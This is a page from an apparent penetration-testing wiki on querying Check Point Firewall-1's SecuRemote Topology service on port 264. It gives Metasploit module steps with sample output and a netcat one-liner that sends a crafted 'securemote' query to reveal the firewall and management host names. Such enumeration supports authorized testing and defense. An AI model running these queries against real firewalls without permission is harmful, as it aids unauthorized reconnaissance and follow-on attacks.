๐Ÿ•ต๏ธ
VeryLazyTech
๐Ÿ“œ Medium๐Ÿ›’ My Shop๐Ÿ‘พ Github๐Ÿ“ฉ Telegram ๐Ÿ“บ YouTubeโœ– Twitter
  • ๐Ÿ•ต๏ธWelcome!
    • VeryLazyTech
    • Support VeryLazyTech
      • ๐Ÿ‘พ GitHub
      • ๐Ÿ“œ Medium
      • โ˜• My Shop
      • ๐Ÿ“บ YouTube
      • โœ– Twitter
      • ๐Ÿ“ฉ Telegram
  • ๐Ÿ›ก๏ธ Vulnerabilities and Exploits
    • CVE - POC
      • Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692
      • POC - CVE-2024โ€“4956 - Nexus Repository Manager 3 Unauthenticated Path Traversal
      • POC - CVE-2024-45241: Path Traversal in CentralSquare's CryWolf
      • Telerik Auth Bypass CVE-2024-4358
      • Check Point Security Gateways Information Disclosure - CVE-2024-24919
      • CVE-2024-23897 - Jenkins File Read Vulnerability
      • CVE-2024โ€“10914- Command Injection Vulnerability in name parameter for D-Link NAS
      • POC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE)
      • CVE-2024-9935 - PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary
      • CVE-2024-50623- Cleo Unrestricted file upload and download
      • POC - WordPress File Upload plugin, in the wfu_file_downloader.php file before version <= 4.24.11
      • POC - Remote and unauthenticated attacker can send crafted HTTP requests to RCE - cve-2025-3248
      • POCโ€Š-โ€ŠCVE-2025โ€“2539 File Away <= 3.9.9.0.1โ€Š-โ€ŠMissing Authorization to Unauthenticated Arbitrary File
      • POC - CVE-2025-29306 FOXCMS /images/index.html Code Execution Vulnerability
  • ๐Ÿ•ต๏ธโ€โ™‚๏ธDorks
    • GitHub Dorks
    • Google Dork Online Tool
  • ๐Ÿ“š Resources
    • Top Hacking Books for 2024: FREE and Paid
    • How to Study for OSCP with the PWK Book PDF
    • Top 20 phishing tools to use in 2024
    • Top 8 Bug Bounty Books for 2025: Must-Reads for Ethical Hackers
    • Top Hacking Tools and Skills You Need to Learn in 2025
    • Offensive Cloud
    • Penetration Testing & Hacking Tools List
    • Top Cybersecurity Books by Topic
  • The Ultimate Penetration Testing Methodology (2025 Edition)
  • ๐Ÿ•ธ๏ธPentesting Web
    • Client Side Template Injection (CSTI)
    • Identify a Serverโ€™s Origin IP
    • 2FA/MFA/OTP Bypass
  • IDOR
  • Open Redirect
  • Subdomain Takeover
  • Penetration Testing WiFi Networks
  • Client-Side Path Traversal
  • Clickjacking
  • Command Injection
  • JWT Vulnerabilities
  • Bypass rating limit
  • CORS - Misconfigurations & Bypass
  • LDAP Injection
  • File upload vulnerabilities
  • Content Security Policy (CSP) bypass
  • ๐ŸงLinux
    • Practical Linux Commands
    • Bypassing Bash Restrictions - Rbash
    • Privilege escalation - Linux
  • Linux Environment Variables
  • ๐ŸชŸWindows
    • Active Directory Methodology
  • ๐ŸŒNetwork Pentesting
    • FTP - Port 21
    • SSH- Port 22
    • Telnet - Port 23
    • SMTP/s - Port 25,465,587
    • WHOIS - Port 43
    • TACACS+ - Port 49
    • DNS - Port 53
    • TFTP/Bittorrent-tracker - Port 69/UDP
    • Finger - Port 79
    • Web - Port 80,443
    • Kerberos - Port 88
    • POP - Port 110/995
    • Portmapper - Port 111/TCP/UDP
    • Ident - Port 113
    • NTP - Port 123/UDP
    • MSRPC - Port 135, 539
    • NetBios - Port 137,138,139
    • SMB - Port 139 445
    • IMAP - Port 143, 993
    • SNMP - Ports 161, 162, 10161, and 10162/UDP
    • IRC - Ports 194,6667,6660-7000
    • Check Point Firewall - Port 264
    • LDAP - Ports 389, 636, 3268, 3269
    • IPsec/IKE VPN - Port 500/UDP
    • Modbus - Port 502
    • Rexec - Port 512
    • Rlogin - Port 513
    • Rsh - Port 514
    • Line Printer Daemon (LPD) - Port 515
    • Apple Filing Protocol (AFP) - PORT 548
    • RTSP - Port 554, 8554
    • IPMI - Port 623/UDP/TCP
    • Internet Printing Protocol (IPP) - Port 631
    • EPP - Port 700
    • Rsync - Port 873
    • Rusersd Service - Port 1026
    • Socks - Port 1080
    • Java RMI - RMI-IIOP - Port 1098/1099/1050
    • MSSQL (Microsoft SQL Server) - Port 1433
    • Oracle TNS Listener - Port 1521,1522-1529
  • PPTP - Port 1723
  • MQTT (Message Queuing Telemetry Transport) - Port 1883
  • Compaq HP Insight Manager - Port 2301, 2381
  • NFS Service - Port 2049
  • Docker - Port 2375,2376
  • Squid - Port 3128
  • iScsi - Port 3260
  • SAPRouter - Port 3299
  • ๐Ÿ˜ŽPost-exploitation
    • File Transfer Cheatsheet: Windows andย Linux
  • ๐Ÿง‘โ€๐Ÿ”งTechnical guides
    • Kali Linux - Installation
Powered by GitBook
On this page
  • Basic info
  • Exploiting CheckPoint Firewall-1 with Metasploit
  • Alternative Method: Extracting Hostname and ICA Name Manually

Was this helpful?

  1. Network Pentesting

Check Point Firewall - Port 264

PreviousIRC - Ports 194,6667,6660-7000NextLDAP - Ports 389, 636, 3268, 3269

Last updated 2 months ago

Was this helpful?

Become VeryLazyTech ! ๐ŸŽ

  • Follow us on:

    • โœ– Twitter .

    • ๐Ÿ‘พ Github .

    • ๐Ÿ“œ Medium .

    • ๐Ÿ“บ YouTube .

    • ๐Ÿ“ฉ Telegram .

    • ๐Ÿ•ต๏ธโ€โ™‚๏ธ My Site .

  • Visit our for e-books and courses. ๐Ÿ“š

Basic info

CheckPoint Firewall-1 is a widely used firewall solution, but certain configurations allow attackers to extract valuable information about the firewall and its management station. This article will demonstrate how an attacker can leverage port 264/TCP to obtain critical details using publicly available tools and commands.

CheckPoint Firewall-1 includes a SecuRemote Topology service running on port 264/TCP, which allows unauthenticated queries. By interacting with this service, attackers can retrieve the firewall's hostname and the SmartCenter management station's nameโ€”potentially leading to further attacks.

The ability to obtain these details is particularly dangerous because it helps attackers map the network infrastructure, identify targets for further exploitation, and develop customized phishing attacks.


Exploiting CheckPoint Firewall-1 with Metasploit

Metasploit provides a module that can interact with the firewall to extract its hostname and management station name.

Step 1: Load the Metasploit Module

Open Metasploit and load the auxiliary module:

use auxiliary/gather/checkpoint_hostname

Step 2: Set Target IP Address

Set the RHOST parameter to the target CheckPoint Firewall-1 instance:

set RHOST 10.10.10.10

Step 3: Execute the Module

Run the module to interact with the firewall:

run

If the firewall is vulnerable, the module will successfully contact the SecuRemote Topology service and return output similar to:

[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed

This confirms the presence of the firewall and exposes its internal naming conventions.


Alternative Method: Extracting Hostname and ICA Name Manually

If Metasploit is unavailable, a direct Netcat command can be used to query the firewall:

Step 1: Send Query via Netcat

printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-

Step 2: Analyze the Output

A successful query returns the firewallโ€™s certificate name (CN) and organization (O):

CN=Panama,O=MGMTT.srv.rxfrmi

These values can be used to gain insights into the firewallโ€™s identity and administrative domains.


Support VeryLazyTech ๐ŸŽ‰
  • Follow us on:

Learn & practice

Become VeryLazyTech ! ๐ŸŽ

โœ– Twitter .

๐Ÿ‘พ Github .

๐Ÿ“œ Medium .

๐Ÿ“บ YouTube .

๐Ÿ“ฉ Telegram .

๐Ÿ•ต๏ธโ€โ™‚๏ธ My Site .

Visit our for e-books and courses. ๐Ÿ“š

๐ŸŒ
member
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
shop
For the OSCP.
member
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
shop